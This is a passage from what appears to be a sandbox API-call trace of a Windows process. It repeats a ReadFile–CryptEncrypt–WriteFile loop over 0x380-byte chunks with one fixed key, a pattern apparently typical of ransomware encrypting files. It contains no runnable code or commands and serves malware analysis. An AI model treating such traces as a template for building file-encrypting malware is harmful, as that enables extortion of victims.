hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.360] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.360] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.360] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.360] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.360] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.360] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.360] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.360] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.360] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.360] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.360] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.361] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.361] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.361] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.361] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.361] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.361] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.361] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.361] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.361] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.362] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.362] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.362] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.362] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.362] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.362] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.362] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.362] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.362] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.362] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.362] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.362] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.363] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.363] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.363] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.363] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.363] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.363] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.363] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.363] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.363] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.363] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.363] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.363] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.363] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.363] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.364] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.364] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.364] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.364] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.364] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.364] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.364] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.364] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.364] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.364] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.364] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.364] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.364] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.365] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.365] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.365] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.365] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.365] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.365] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.365] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.365] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.365] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.365] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.365] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.365] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.365] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.365] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.365] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.366] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.366] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.366] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.366] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.366] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.366] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.366] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.366] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.366] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.366] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.366] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.366] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.367] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.367] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.367] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.367] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.367] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.367] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.367] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.367] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.367] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.367] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.367] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.367] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.367] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, 